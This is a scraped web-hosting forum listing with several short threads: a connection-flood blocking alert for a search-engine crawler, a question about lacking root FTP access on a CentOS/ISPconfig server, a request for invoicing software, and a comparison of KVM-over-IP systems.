Time: Wed Apr 18 03:37:58 2007
IP: xx.xx.xxx.xx (livebot-65-55-212-73.search.live.com)
Connections: 198
Blocked: temporarily

Connections:
tcp 0 0 xx.xx.xxx.xxx:80 xx.xx.xxx.xx:39478 TIME_WAIT
tcp 0 0 xx.xx.xxx.xxx:80 xx.xx.xxx.xx:38710 TIME_WAIT
tcp 0 0 xx.xx.xxx.xxx:80 xx.xx.xxx.xx:40501 TIME_WAIT
tcp 0 0 xx.xx.xxx.xxx:80 xx.xx.xxx.xx:40499 TIME_WAIT
..........
--------------------------------------------

View Replies! View Related

FTP As Root
I just recently had someone from this forum install CentOS for me with ISPconfig and required modules to successfully run PHPmotion. However, the only FTP I can access are the ones I create FTP for in ISPconfig, such as web1_admin, web1_testuser, etc.

When installing a CentOS server with ISPconfig, isn't there a root to log into the FTP?

With the FTP accounts that I have, I cannot access public and home directory such as /var/www directories.

Is there suppose to be an account for FTP so I can succcessfully overlook the whole server?

I want to take a look at all the websites I have such as /var/www/www.test1.com, /var/www/www.test2.com, etc. all through FTP. However, I cannot do this. It's almost like I have no Admin power over my server.

He did not provide me with a root FTP account or any super admin FTP account. I am not sure if something suspicious is going on or not. Please help. I do not want to get hacked in and stolen files.

View Replies! View Related

Invoicing System
Is there any billing software/scripts that enable customer to view their invoice without login?

View Replies! View Related

KVM Over IP System
I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare.

I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.

So far I've came across the Raritan Dominion KX II which looks pretty promising. Is there any other KVM over IP systems or manufactures that I should look into? Has anyone used this and can you comment about its reliability?

View Replies! View Related